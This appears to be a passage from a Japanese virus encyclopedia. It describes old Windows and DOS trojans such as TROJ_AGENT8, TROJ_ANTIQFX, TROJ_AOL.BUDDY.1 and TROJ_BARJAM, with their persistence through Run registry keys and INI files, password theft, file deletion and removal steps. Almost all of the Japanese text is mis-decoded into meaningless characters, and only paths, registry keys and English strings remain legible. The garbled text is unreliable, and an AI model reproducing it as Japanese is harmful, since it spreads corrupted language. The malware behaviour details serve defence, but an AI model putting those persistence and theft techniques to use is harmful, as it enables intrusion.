¡¡¤³¤ì¤Ï¥Ï¥Ã¥­¥ó¥°¥Ä¡¼¥ë¤Ç¤¹¡£¥µ¡¼¥Ð¡¼¥×¥í¥°¥é¥à¤È¥¯ ¥é¥¤¥¢¥ó¥È¥×¥í¥°¥é¥à¤Ëʬ¤«¤ì¤Æ¤ª¤ê¡¢¥µ¡¼¥Ð¡¼¥×¥í¥°¥é ¥à¤ò¥È¥í¥¤¤ÎÌÚÇϤȤ·¤Æ¥Þ¥·¥ó¤Î¥·¥¹¥Æ¥à¤ËÀøÆþ¤µ¤»¡¢¥¯ ¥é¥¤¥¢¥ó¥È¥×¥í¥°¥é¥à¤ò»ÈÍѤ·¤Æ¥ê¥â¡¼¥ÈÁàºî¤ò¹Ô¤¤¤Þ ¤¹¡£Â¾¤Î¥Õ¥¡¥¤¥ë¤Ø¤Î´¶À÷³èư¤Ï¹Ô¤¤¤Þ¤»¤ó¡£ ¡¡¥µ¡¼¥Ð¡¼¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤·¤Æ¤âɽ¸þ¤­¤Ï²¿¤âµ¯¤³¤é¤º ¤Ë¼Â¹Ô½ªÎ»¤·¤Þ¤¹¡£¤·¤«¤·¡¢Î¢¤Ç¥·¥¹¥Æ¥à¤ò²þÊѤ·¥¯¥é¥¤ ¥¢¥ó¥È¥×¥í¥°¥é¥à¤ò»ý¤Ä¥Ï¥Ã¥«¡¼¤¬¤½¤Î¥Þ¥·¥ó¤Ë¥¢¥¯¥»¥¹ ¤Ç¤­¤ë¤è¤¦¤Ë¤·¤Æ¤·¤Þ¤¤¤Þ¤¹¡£ ¡¡¥µ¡¼¥Ð¡¼¥×¥í¥°¥é¥à¤¬µ¯Æ°¤µ¤ì¤ë¤ÈWindows¥Ç¥£¥ì¥¯¥È¥ê
(Ä̾ï¤ÏC:\windows¡Ë¤Ë"EXPIORER.EXE"¤È¤¤¤¦¥Õ¥¡¥¤¥ë¤òºî
À®¤·¤Þ¤¹¡£¼¡¤Ë \HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows\CurrentVersion\Run ¥ì¥¸¥¹¥È¥ê¤Ë Expiorer=C:\
WINDOWS\EXPIORER.EXE ¤ÈÃͤòÅÐÏ¿¤·¥·¥¹¥Æ¥àµ¯Æ°»þ¤Ë¼«Æ° µ¯Æ°¤¹¤ë¤è¤¦ÀßÄê¤ò¹Ô¤¤¤Þ¤¹¡£ ¡¡¥¯¥é¥¤¥¢¥ó¥È¥×¥í¥°¥é¥à¤ò»ý¤Ä¥Ï¥Ã¥«¡¼¤Ï¥µ¡¼¥Ð¡¼¥×¥í ¥°¥é¥à¤¬Æ°ºî¤·¤Æ¤¤¤ë£Ð£Ã¤ËÂФ·¤Æ°Ê²¼¤Î¥ª¥Ú¥ì¡¼¥·¥ç¥ó
¤¬¹Ô¤¨¤Þ¤¹:
¡¦CD-ROM¥É¥é¥¤¥Ö¤Î³«ÊÄ ¡¦¥¨¥é¡¼²»¤òÌĤ餹 ¡¦Ctrl-Alt¡ÝDel¥­¡¼¤Î̵¸ú²½ ¡¦¥Þ¥¦¥¹¥«¡¼¥½¥ë¤òư¤«¤¹ ¡¦¥·¥¹¥Æ¥à¤ò¥Õ¥ê¡¼¥º¤µ¤»¤ë ¡¦¥¹¥¿¡¼¥È¥Ü¥¿¥ó¤ò±£¤¹ ¡¦²èÌ̤òÅÀÌǤµ¤»¤ë ¡¦¥Ç¥¹¥¯¥È¥Ã¥×¤Ø¤Î½ñ¤­¤³¤ß ¡¦¥Î¡¼¥È¥Ñ¥Ã¥É¤Ø¤Î½ñ¤­¤³¤ß ¡¦¥Õ¥¡¥¤¥ëºï½ü¥á¥Ã¥»¡¼¥¸¤Îɽ¼¨ ¡¦¥¹¥¯¥ê¡¼¥ó¥­¥ã¥×¥Á¥ã¤ò¼è¤ë ¡¦¥Ñ¥¹¥ï¡¼¥É¤òÅð¤à ¡¦FTP¤Î¥ª¥ó/¥ª¥Õ ¡¦ICQÈÖ¹æ¤òÅð¤à ¡¦¥É¥é¥¤¥Ö¤Î¥Ç¥£¥ì¥¯¥È¥êÆâÍÆ¤ò¸«¤ë ¡¦¥·¥¹¥Æ¥à¾ðÊó¤Î¼èÆÀ ¡¦Windows¤Î½ªÎ» ¡¦¥Õ¥¡¥¤¥ëºï½ü ¡¡¥µ¡¼¥Ð¡¼¥×¥í¥°¥é¥à¤Î¥µ¥¤¥º¤Ï154,112bytes¡¢¥¯¥é¥¤¥¢ ¥ó¥È¥×¥í¥°¥é¥à¤Î¥µ¥¤¥º¤Ï237,056bytes¤Ç¤¹¡£
È÷¡¡¡¡¹Í:
¥·¥¹¥Æ¥à½¤ÉüÊýË¡ 1.¥ì¥¸¥¹¥È¥ê¥¨¥Ç¥£¥¿¤òÍøÍѤ·¤ÆºîÀ®¤µ¤ì¤¿¥ì¥¸¥¹¥È¥ê¥¨ ¥ó¥È¥ê¤ÎÃͤòºï½ü¤·¤Þ¤¹¡£ ¡¡HKEY_LOCAL_MACHINES\Software\Microsoft\Windows\ Command\Run ¤Î¡¢
¡¡"Expiorer=C:\WINDOWS\EXPIORER.EXE"
2.¤³¤ì¤Ë¤è¤ê¥ï¡¼¥à¤Ï¼«Æ°µ¯Æ°¤¬¤Ç¤­¤Ê¤¯¤Ê¤ê¤Þ¤¹¤Î¤Ç¥Þ ¥·¥ó¤òºÆµ¯Æ°¤·¤Þ¤¹¡£ 3.¥¦¥¤¥ë¥¹¥Ð¥¹¥¿¡¼¤¬È¯¸«¤·¤¿¥Õ¥¡¥¤¥ë¤ò¤¹¤Ù¤Æºï½ü¤·¤Þ ¤¹¡£ °Ê¾å¤Ç¤¹¡£

TROJ_AGENT8


̾¡¡¡¡¾Î:TROJ_AGENT8

¸À¡¡¡¡¸ì:¥É¥¤¥Ä¸ì

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Win32

¥¦¥¤¥ë¥¹¥µ¥¤¥º:274¥­¥í¥Ð¥¤¥È

ȯ¾ÍÃÏ:¥É¥¤¥Ä

¾Ü¡¡¡¡ºÙ:Backdoor¤äBack Orifice¤Ë»÷¤¿¥Ï¥Ã¥«¡¼¥Ä¡¼¥ë
¤Ç¤¢¤ë¡£ ÉÔÃí°Õ¤Ë¼Â¹Ô¤·¤Æ¤·¤Þ¤¦¤È¡¢¥¦¥¤¥ë¥¹¤Ï¡¢RAS¥Ñ¥¹¥ï¡¼¥É¤Ê ¤É¤Î¥¢¥¯¥»¥¹¸¢¸Â¤òÃ¥¤ª¤¦¤È¤¹¤ë¡£¤½¤ì¤ËÀ®¸ù¤¹¤ë¤È¥Ï¥Ã ¥«¡¼¤Ï¡¢¥Í¥Ã¥È¡¼¥ï¡¼¥¯·Ðͳ¤Ç¡¢´¶À÷¥Þ¥·¥ó¤Î¥­¡¼¥Ü¡¼ ¥É¡¢¥Þ¥¦¥¹¡¢¥â¥Ë¥¿¡¼¡¢¥Ç¥£¥¹¥¯¡¢¥É¥é¥¤¥Ö¤Ê¤É¤òÁàºî¤Ç ¤­¤ë¤è¤¦¤Ë¤Ê¤ë¡£¤Þ¤¿¡¢¥Õ¥¡¥¤¥ë¤Ë¥¢¥¯¥»¥¹¤·¡¢ºï½ü¤¹¤ë ¤³¤È¤â¤Ç¤­¤ë¡£

TROJ_ANSIBMBR-1


̾¡¡¡¡¾Î:TROJ_ANSIBMBR-1

ÊÌ¡¡¡¡Ì¾:ANSI BOMBER

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

¥¦¥¤¥ë¥¹¥µ¥¤¥º:44ޤ800 bytes

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:¡¡-¡¡¥È¥í¥¤¤ÎÌÚÇÏ·¿°­¼Á¥×¥í¥°¥é¥à¤Ç¤¢¤ëŽ¡´¶
À÷³èư¤Ï¹Ô¤ï¤Ê¤¤Ž¡ -¡¡¤³¤Î¥×¥í¥°¥é¥à¤Ïޤ¥­¡¼¥Ü¡¼¥É¤Î¥­¡¼³ä¤êÅö¤Æ¤òÊѹ¹¤· ¤Æ¤·¤Þ¤¦¥Ð¥Ã¥Á¥Õ¥¡¥¤¥ë(ANSI.SYS)¤òºîÀ®¤¹¤ë¥Ä¡¼¥ë¤Ç¤¢ ¤ëŽ¡¤³¤ì¤Ë¤è¤Ã¤ÆºîÀ®¤µ¤ì¤¿¥Õ¥¡¥¤¥ë¤ò¤À¤ì¤«¤Ë ¼Â¹Ô¤µ¤»ÉáÃÊÄ̤ê¤Ë»ÈÍѤµ¤»¤ë¤À¤±¤Çޤ¥­¡¼¤Î³ä¤êÅö¤Æ¤Ë¤è ¤Ã¤Æ¤ÏÂоݤΥޥ·¥ó¤Ë¤µ¤Þ¤¶¤Þ¤ÊÇ˲õ³èư¤òµÚ¤Ü¤¹¤³¤È¤¬ ²Äǽ¤È¤Ê¤¤Ž¡
È÷¡¡¡¡¹Í:

TROJ_ANTIQFX


̾¡¡¡¡¾Î:TROJ_ANTIQFX

ÊÌ¡¡¡¡Ì¾:W32.Antiqfx.Wormʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

¥¦¥¤¥ë¥¹¥µ¥¤¥º:114,688 bytes

¾Ü¡¡¡¡ºÙ:TROJ_ANTIQFX¤Ï¡¢¥í¡¼¥«¥ë¥Í¥Ã¥È¥ï¡¼¥¯Æâ¤Ç³È
»¶¤¹¤ë¥ï¡¼¥à·¿¥¦¥¤¥ë¥¹¤Ç¤¹¡£¥Í¥Ã¥È¥ï¡¼¥¯¾å¤Î¾¤Î¥Þ¥· ¥ó¤Î¡¢¥¹¥¿¡¼¥È¥¢¥Ã¥×¥Ç¥£¥ì¥¯¥È¥ê¤Ë¼«Ê¬¼«¿È¤ò¥³¥Ô¡¼¤· ¤Þ¤¹¡£
¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤¹¤ë¤È¡¢¤Þ¤º¡¢C:\windows ¥Ç¥£¥ì¥¯¥È¥ê¤Î
Ãæ¤Ë¡ÉMSCDEX.EXE¡É¤È¤¤¤¦¥Õ¥¡¥¤¥ë̾¤Ç¼«Ê¬¼«¿È¤ÎÊ£À½¤ò ºîÀ®¤·¤Þ¤¹¡£ ¤Þ¤¿¡¢°Ê²¼¤Î¥ì¥¸¥¹¥È¥ê¥¨¥ó¥È¥ê¤ËÃÍ¡Ècdrom¡É ¥Ç¡¼¥¿ ¡È
c:\windows\mscdex.exe¡É¤òÄɲä·¤Þ¤¹¡£
HKEY_LOCAL_MACHINES\Software\MicroSoft\Windows\ CurrentVersion\Run HKEY_LOCAL_MACHINES\Software\MicroSoft\Windows\ CurrentVersion\RunOnce HKEY_LOCAL_MACHINES\ Software\MicroSoft\Windows\CurrentVersion\RunServices ¤³¤Î¤¿¤á¡¢¼¡²ó¤Î¥·¥¹¥Æ¥à¤Îµ¯Æ°»þ¤è¤êɬ¤º¥ï¡¼¥à¤¬¼Â¹Ô ¤µ¤ì¤ë¤è¤¦¤Ë¤Ê¤ê¤Þ¤¹¡£ Ʊ»þ¤Ë¡¢¥¦¥¤¥ë¥¹¤Ï¤¹¤Ù¤Æ¤Î¡ÉCAT¡É(¥»¥­¥å¥ê¥Æ¥£¥«¥¿¥í ¥°)¥Õ¥¡¥¤¥ë¤òºï½ü¤·¤Þ¤·¤Þ¤¹¡£CAT¥Õ¥¡¥¤¥ë¤È¤Ï¸ß´¹À­¤Î ¤¢¤ë¥Ï¡¼¥É¥¦¥§¥¢¤ò·èÄꤹ¤ë¤¿¤á¤Ë»ÈÍѤµ¤ì¤ë¥Õ¥¡¥¤¥ë¤Ç ¤¹¡£
È÷¡¡¡¡¹Í:****¼êưºï½ü¼ê½ç
¥ì¥¸¥¹¥È¥ê¥¨¥Ç¥£¥¿¤òÍøÍѤ·¤Æ¡¢°Ê²¼¤Î¥ì¥¸¥¹¥È¥ê¥¨
¥ó¥È¥ê¤ÎÃÍ¡Ècdrom¡É ¥Ç¡¼¥¿ ¡Èc:\windows\mscdex.exe¡É
¤òºï½ü¤·¤Þ¤¹¡£ HKEY_LOCAL_MACHINES\Software\MicroSoft\ Windows\CurrentVersion\Run HKEY_LOCAL_MACHINES\Software\MicroSoft\ Windows\CurrentVersion\RunOnce HKEY_LOCAL _MACHINES\Software\MicroSoft\Windows\CurrentVersion\ RunServices MSCDEX.exe ¤È¤¤¤¦¥Õ¥¡¥¤¥ë¤òºï½ü¤·¤Æ¤¯¤À¤µ ¤¤¡£ ¥ì¥¸¥¹¥È¥ê¤òÊѹ¹¤¹¤ë¤Î ¤ÏÈó¾ï¤Ë¥Ç¥ê¥±¡¼¥È¤Ê¹Ô°Ù¤Ç¤¢¤êޤ¸í¤Ã¤¿Áàºî¤ò¹Ô¤¦¤Èޤ¥· ¥¹¥Æ¥à¤Ë»½ý¤òÍ¿¤¨¤ë²ÄǽÀ­¤¬¤¢¤ê¤Þ¤¹Ž¡¥ì¥¸¥¹¥È¥ê¤Î½¤Éü ¤Ï¿µ½Å¤Ë¹Ô¤Ã¤Æ¤¯¤À¤µ¤¤Ž¡

TROJ_AOL.BUDDY.1


̾¡¡¡¡¾Î:TROJ_AOL.BUDDY.1

¥¦¥¤¥ë¥¹¥µ¥¤¥º:236,544¥Ð¥¤¥È

¾Ü¡¡¡¡ºÙ:¥¤¥ó¥¿¡¼¥Í¥Ã¥È·Ðͳ¤Ç¾¡¼ê¤ËAOL¥æ¡¼¥¶¡¼¤Î¾ðÊó
¤òÁ÷¤ë¥¿¥¤¥×¤Î¥È¥í¥¤¤ÎÌÚÇÏ·¿¥¦¥¤¥ë¥¹¤Ç¤¢¤ë¡£ ¡ÊÁ÷ÉÕÀè¤Î¥¢¥É¥ì¥¹¤Ï¡¢abcdefa1234@hotmail.com¡Ë ¡¡ÉÔÃí°Õ¤Ê¥æ¡¼¥¶¡¼¤¬¥¦¥¤¥ë¥¹¤ò´Þ¤ó¤À¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤· ¤Æ¤·¤Þ¤¦¤È¡¢¥¦¥¤¥ë¥¹¤Ï¼«¿È¤Î¥³¥Ô¡¼¤ò¤¤¤¯¤Ä¤«ºîÀ®¤·¡¢ ¼¡²ó°Ê¹ß¤Î¥¦¥£¥ó¥É¥¥¥º¤Îµ¯Æ°¤ÎºÝ¤Ë¾ïÃ󤹤ë¤è¤¦¤Ë¥·¥¹ ¥Æ¥à¤ò½ñ¤­´¹¤¨¤ë¡£ ¥¦¥¤¥ë¥¹¤Ï¡¢°Ê²¼¤Î¥Õ¥¡¥¤¥ë¤òºîÀ®¤·¡¢±£¤·Â°À­¤òÊݸ¤¹ ¤ë¡£
C:\Command.exe

C:\America Online 4.0\BuddyList.exe

C:\Windows\System\NortonAntiVir

C:\Windows\System\vclcntl.dll

C:\Windows\System\WinSaver.exe

C:\Windows\System\NortonAntiVir\RegistryReminder.exe
¡¡WIN.INI¤ÈSYSTEM.INI¤Ë¡¢°Ê²¼¤Î²þÊѤò¹Ô¤Ê¤¦¡£
WIN.INI¤ËÂФ·:

Load= C:\America Online 4.0\BuddyList.exe

Run= C:\Windows\System\NortonAntiVir\
RegistryReminder.exe ¡Ê¤³¤ì¤Ë¤è¤ê¡¢¥¦¥£¥ó¥É¥¥¥º¤¬µ¯Æ°¤¹¤ë¤Ó¤Ë¥¦¥¤¥ë¥¹¤¬¾ï Ã󤹤ë¤è¤¦¤Ë¤Ê¤ë¡£¡Ë
SYSTEM.INI¤ËÂФ·:

SCRNSAVE.EXE=c:\windows\system\WinSaver.exe
¡Ê¤³¤ì¤Ë¤è¤ê¡¢¥¦¥£¥ó¥É¥¥¥º¥·¥¹¥Æ¥à¤Ï¡¢¥¦¥¤¥ë¥¹¤ò¥¹¥¯ ¥ê¡¼¥ó¡¦¥»¡¼¥Ð¡¼¤È¤ß¤Ê¤¹¤è¤¦¤Ë¤Ê¤ë¡£¡Ë ¡¡¤Þ¤¿¡¢½é´üµ¯Æ°¤¬½ªÎ»¤·¤¿»þ¤Ë°Ê²¼¤Î¥á¥Ã¥»¡¼¥¸¤¬É½¼¨ ¤µ¤ì¤ë¡£ ¡ÈNo object associated with file¡É

TROJ_AOL.PSW.B


̾¡¡¡¡¾Î:TROJ_AOL.PSW.B

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿¡¢NE·¿

ÂС¡¡¡¾Ý:Windows3.xx

¥¦¥¤¥ë¥¹¥µ¥¤¥º:25kb

¾Ü¡¡¡¡ºÙ:AmericanOnline¡ÊAOL¡Ë¥æ¡¼¥¶¡¼¤Î¥í¥°¥¤¥ó̾¤ä
¥Ñ¥¹¥ï¡¼¥É¤òÅð¤â¤¦¤È¤¹¤ë¡£Norton Anti Virus¤ÈMcAfee¡Ç s Vshwin32¤¬¥¤¥ó¥¹¥È¡¼¥ë¤µ¤ì¤Æ¤¤¤ë¤«¤É¤¦¤«¥Á¥§¥Ã¥¯ ¤·¡¢¤³¤ì¤é¤Î¥¦¥¤¥ë¥¹Âкö¥½¥Õ¥È¤Ç¸¡½Ð¤µ¤ì¤Ê¤¤¤è¤¦¤Ë¤¹ ¤ë¡£ KI@SKI¤È¤¤¤¦¥¦¥¤¥ë¥¹ºî¼Ô¤Î½ð̾¤¬¤¤¤¯¤Ä¤«¸«¤é¤ì¤ë¡£ ¤Þ¤¿¡¢TROJ_PRETTYPARK¤ÈƱ¤¸¤è¤¦¤Ë¡¢¥Õ¥ì¡¼¥à¥¿¥°¡ô 32770¤ò¥Á¥§¥Ã¥¯¤¹¤ë¡£

TROJ_AOL.SPEED


̾¡¡¡¡¾Î:TROJ_AOL.SPEED

ÊÌ¡¡¡¡Ì¾:TROJAN.AOL.SPEED, SPEED TROJAN

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

¥¦¥¤¥ë¥¹¥µ¥¤¥º:2,890 bytes

¾Ü¡¡¡¡ºÙ:¤³¤ì¤Ï¥È¥í¥¤¤ÎÌÚÇÏ·¿ÉÔÀµ¥×¥í¥°¥é¥à¤Ç¤¢¤ë¡£
¼Â¹Ô¤¹¤ë¤È¤Þ¤º°Ê²¼¤Î¥á¥Ã¥»¡¼¥¸¤òɽ¼¨¤¹¤ë¡£ ¡ÉWelcome to AOL SPEED ENHANCER (beta) This program is a beta release from America Online(R). It edits your America online tools to enhance the modem initialiatization strings. There is no threat to using this program. If you are unsatisfied with this
program you may run the uninstal.com file in your C:
\AOLSPEED directory. Setup will now examine your hard disk for various copies of AOL that you have. No changes to your computer will be made at this time... ¡É ¼¡¤Ë¡¢°Ê²¼¤Î¥Ç¥£¥ì¥¯¥È¥ê¤ò£Ã¥É¥é¥¤¥Ö¤ËºîÀ®¤¹¤ë¡£
c:\you\have\been\attacked\by\Lee¡Çs\Aol\fake\Speed\
Enhancer ¤½¤Î¸å°Ê²¼¤Î¥á¥Ã¥»¡¼¥¸¤òɽ¼¨¤¹¤ë¡£ ¡ÈSpeed enhancer found a modem and your AOL directory. AOL will now edit your AOL tools to enhance modem capabilities¡É ¤½¤·¤Æ°Ê²¼¤Î¥Õ¥¡¥¤¥ë¤òºï½ü¤·¤Æ¤·¤Þ¤¦¡£
c:\autoexec.bat,c:\config.sys,c:\io.sys,c:\msdos.sys,

c:\aol20\waol.exe,c:\waol15\waol.exe,c:\command.com
¤µ¤é¤Ë°Ê²¼¤Î¥á¥Ã¥»¡¼¥¸¤òɽ¼¨¤¹¤ë¡£ ¡ÈYour AOL tools have been enhnaced. Thank you for using Aol Speed enhancer¡É ºÇ¸å¤Ë°Ê²¼¤Î¥á¥Ã¥»¡¼¥¸¤òDOS¥×¥í¥ó¥×¥È¤Çɽ¼¨¤¹¤ë¡£ ¡Èyou have been infected, you stupid Lamer!!! hahaha! !!¡É

TROJ_AOL.WINSYST


̾¡¡¡¡¾Î:TROJ_AOL.WINSYST

ÊÌ¡¡¡¡Ì¾:TROJ_AOL.WINCYST

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Win3.xx

¥¦¥¤¥ë¥¹¥µ¥¤¥º:53,248bytes

¾Ü¡¡¡¡ºÙ:-¡¡
¡¡¤³¤ì¤Ï¥È¥í¥¤¤ÎÌÚÇÏ·¿ÉÔÀµ¥×¥í¥°¥é¥à¤Ç¤¹¡£Â¾¤Î¥Õ¥¡¥¤ ¥ë¤Ø¤Î´¶À÷³èư¤Ï¹Ô¤¤¤Þ¤»¤ó¡£°ì¸Ä¤Î¥×¥í¥°¥é¥à¤Ê¤Î¤Ç¶î ½ü¤Ï¤Ç¤­¤Þ¤»¤ó¡£È¯¸«¤·¤¿¥Õ¥¡¥¤¥ë¤òºï½ü¤·¤Æ¤¯¤À¤µ¤¤¡£ ¤³¤Î¥È¥í¥¤¤ÎÌÚÇϤòµ¯Æ°¤·¤Æ¤â¡¢²¿¤âɽ¼¨¤µ¤ì¤º½ªÎ»¤·¤¿ ¤«¤Î¤è¤¦¤Ë¸«¤¨¤Þ¤¹¤¬¡¢¼Â¤Ï΢¤Çưºî¤·¤ÆAOL¤Î¥Ñ¥¹¥ï¡¼¥É ¤òÅð¤ó¤Ç¥¦¥¤¥ë¥¹ºî¼Ô¤Ë¥á¡¼¥ë¤ÇÁ÷¿®¤·¤Þ¤¹¡£ ¡¡¤³¤Î¥È¥í¥¤¤ÎÌÚÇϤϵ¯Æ°¤µ¤ì¤ë¤È¤Þ¤ºAOL¤ÎÀßÄê¤Î̵ͭ¤ò Ä´¤Ù¡¢SYSTEM.INI¤«¤é¥Ñ¥¹¥ï¡¼¥É¥Õ¥¡¥¤¥ë¤ò³ä¤ê½Ð¤·¤ÆAOL ¤ÎÀßÄê¤òÍøÍѤ·¥á¡¼¥ë¤ÇÁ÷¿®¤·¤Þ¤¹¡£Æ±»þ¤Ë¼«¤é¤Î¥³¥Ô
¡¼¤òC:\WINDOWS\WINSYST.EXE ¤È C:\WINDOWS\SYSTEM\
WINSYSV.EXE ¤Ëºî¤ê¤Þ¤¹¡£¼Â¹ÔÃæ¤Ï²¿¤Îɽ¼¨¤â¤¢¤ê¤Þ¤»¤ó ¤¬¡¢CTRL-ALT-DEL¤Î¥¿¥¹¥¯¥ê¥¹¥È¾å¤Ë¤Ï̾Á°¤Î¤Ê¤¤¥¿¥¹¥¯ ¤È¤·¤ÆÉ½¼¨¤µ¤ì¤Þ¤¹¡£ ¡¡
È÷¡¡¡¡¹Í:
¡¡¥¦¥¤¥ë¥¹¥³¡¼¥ÉÆâ¤Ë"KI@SKI"¤Îʸ»úÎó¤ò´Þ¤ß¤Þ¤¹¡£

TROJ_BACKDOOR.G


̾¡¡¡¡¾Î:TROJ_BACKDOOR.G

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

¥¦¥¤¥ë¥¹¥µ¥¤¥º:35840£â£ù£ô£å£ó

¾Ü¡¡¡¡ºÙ:BackOrifice¥¦¥¤¥ë¥¹¤ÈƱ¤¸¤¯¡¢¥Í¥Ã¥È¥ï¡¼¥¯·Ð
ͳ¤Ç¥Ï¥Ã¥­¥ó¥°¤ò¹Ô¤Ê¤¦¥Ä¡¼¥ë¡£¥¤¥ó¥¿¡¼¥Í¥Ã¥È¤ËÀܳ¤µ ¤ì¤¿¥³¥ó¥Ô¥å¡¼¥¿¤Ç¥µ¡¼¥Ð¡¼Ž¥¥â¥¸¥å¡¼¥ë¤¬¼Â¹Ô¤µ¤ì¤ë¤È¡¢ IP¥¢¥É¥ì¥¹¤òÆþ¼ê¤·¤¿¡¢¥¯¥é¥¤¥¢¥ó¥ÈŽ¥¥â¥¸¥å¡¼¥ë¤ò¤â¤Ä¥Ï ¥Ã¥«¡¼¤¬¤½¤Î¥³¥ó¥Ô¥å¡¼¥¿¤Ë¥¢¥¯¥»¥¹¤·¡¢±ó³ÖÀ©¸æ¤¹¤ë¤³ ¤È¤¬¤Ç¤­¤ë¤è¤¦¤Ë¤Ê¤ë¡£ ¥¦¥¤¥ë¥¹¤Ë´¶À÷¤·¤¿¥·¥¹¥Æ¥à¤¬¤¤¤Ã¤¿¤óÀ©¸æ¤µ¤ì¤ë¤È¡¢¥Ï ¥Ã¥«¡¼¤Ï»×¤¤¤É¤ª¤ê¤Ë¥³¥ó¥Ô¥å¡¼¥¿¤òÁàºî¤Ç¤­¤ë¡£Îã¤È¤· ¤Æ¤Ï¡¢¥Õ¥¡¥¤¥ë¡¢±ÇÁü¡¢¥­¡¼¥Ü¡¼¥É¥·¥¹¥Æ¥à¤Î´°Á´¤ÊÀ©¸æ ¤ä¡¢¥Ç¥¹¥¯¥È¥Ã¥×¡¢¥â¥Ë¥¿¡¼¡¢¥¹¥Ô¡¼¥«¡¼¡¢CD-ROM¡¢¥Þ¥¦ ¥¹¡¢¥×¥ê¥ó¥¿¡¼¤ÎÀ©¸æ¤Ê¤É¤¬µó¤²¤é¤ì¤ë¡£ ¥Ï¥Ã¥«¡¼¤¬¹Ô¤Ê¤¨¤ëÁàºî¤Ï¡¢¤³¤ì¤é¤Ë¸Â¤é¤ì¤¿¤â¤Î¤Ç¤Ï¤Ê ¤¯¡¢¤Û¤«¤Ë¤â¡¢¥¹¥¿¡¼¥È¥Ü¥¿¥ó¡¢¥Ç¥¹¥¯¥È¥Ã¥×¤Î¥¢¥¤¥³ ¥ó¡¢µ¯Æ°Ãæ¤Î¥×¥í¥»¥¹¡¢³«¤«¤ì¤Æ¤¤¤ë¥¦¥¤¥ó¥É¥¦¤Ê¤É¤ò²þ ¤¶¤ó¤¹¤ë¤³¤È¤¬¤Ç¤­¤ë¡£ ¼Â¹Ô¤µ¤ì¤ë¤È¡¢Windows¥Ç¥£¥ì¥¯¥È¥ê¤Ë°Ê²¼¤Î¥Õ¥¡¥¤¥ë¤òºî À®¤¹¤ë¡£ ¡¡Mvokh_32.dll¡Ê35840¥Ð¥¤¥È¡Ë ¤³¤Î¥Õ¥¡¥¤¥ë¤òsystem.ini¥Õ¥¡¥¤¥ë¤ÎŽ¢bootŽ£¥»¥¯¥·¥ç¥ó ¤Ë¡¢°Ê²¼¤Î¤è¤¦¤ËÅÐÏ¿¤¹¤ë¡£¤³¤Î¤¿¤áµ¯Æ°»þ¤Ëɬ¤º¥È¥í¥¤ ¤ÎÌÚÇϤ¬¼Â¹Ô¤µ¤ì¤ë¤³¤È¤Ë¤Ê¤ë¡£ shell = Explorer.exe Mvokh_32.dll
È÷¡¡¡¡¹Í:¥·¥¹¥Æ¥à¤«¤éTROJ_BACKDOOR.G¤òºï½ü¤¹¤ë¤Ë¤Ï¡¢
¾åµ­¤ÎSystem.ini¤ÎÃͤò°Ê²¼¤Î¤è¤¦¤Ë½¤Àµ¤·¤¿¸åºÆµ¯Æ° ¤·¡¢¥¦¥¤¥ë¥¹¥Ð¥¹¥¿¡¼¤Ç¸¡½Ð¤µ¤ì¤¿¥×¥í¥°¥é¥à¤òºï½ü¤¹ ¤ë¡£ shell = Explorer.exe

TROJ_BARJAM


̾¡¡¡¡¾Î:TROJ_BARJAM

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:DOS 3.0 °Ê¾å

¥¦¥¤¥ë¥¹¥µ¥¤¥º:69078bytes

¾Ü¡¡¡¡ºÙ:¤³¤ì¤Ï¥È¥í¥¤¤ÎÌÚÇÏ·¿°­¼Á¥×¥í¥°¥é¥à¤Ç¤¢¤ë¡£
¾¤Î¥Õ¥¡¥¤¥ë¤Ë´¶À÷¤¹¤ë¤³¤È¤Ï¤Ê¤¤¡£ ¤³¤Î¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤¹¤ë¤È¥á¥â¥ê¤Ë¾ïÃó¤·¡¢¥æ¡¼¥¶¡¼¤¬ Dir¥³¥Þ¥ó¥É¤ò¼Â¹Ô¤¹¤ë¤È¡¢µ¶¤Î¥Ç¥£¥ì¥¯¥È¥ê¾ðÊó¤òɽ¼¨¤¹ ¤ë¡£ ¤Þ¤¿¡¢config.sys, autoexec.bat¤È¤¤¤Ã¤¿DOSÍÑ¥Õ¥¡¥¤¥ë¤ò
ºï½ü¤·¡¢¤µ¤é¤Ë¥ë¡¼¥È¥Ç¥£¥ì¥¯¥È¥ê¤ÈC:\games¤È¤¤¤¦¥Ç¥£
¥ì¥¯¥È¥ê°Ê³°¤Î¥µ¥Ö¥Ç¥£¥ì¥¯¥È¥ê¤ò¤¹¤Ù¤Æºï½ü¤¹¤ë¡£ ¤½¤·¤Æ°Ê²¼¤Î¥á¥Ã¥»¡¼¥¸¤¬É½¼¨¤µ¤ì¤ë¡£ ¡È Bartles & James welcomes you to Virus Hell¡Ä Press F key to save yourself¡Ä¡É ¤³¤Î»Ø¼¨Ä̤ê¤ËF¥­¡¼¤ò²¡¤¹¤È¡¢¥Þ¥·¥ó¤Ï¥ê¥Ö¡¼¥È¤µ¤ì¡¢Æ± »þ¤Ë¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤ÎFAT(¥Õ¥¡¥¤¥ë¥¢¥í¥±¡¼¥·¥ç¥ó¥Æ¡¼¥Ö ¥ë)¤¬Ç˲õ¤µ¤ì¤ë¡£
È÷¡¡¡¡¹Í:¤¿¤À¤·¥×¥í¥°¥é¥à¤Ë¥Ð¥°¤¬¤¢¤ë¤¿¤á¡¢¤³¤ì¤é¥×
¥í¥»¥¹¤Î¼Â¹ÔÃæ¤Ë¥Ï¥ó¥°¥¢¥Ã¥×¤¹¤ë¤³¤È¤¬Â¿¤¤¡£

TROJ_BCK_NBSPY-1


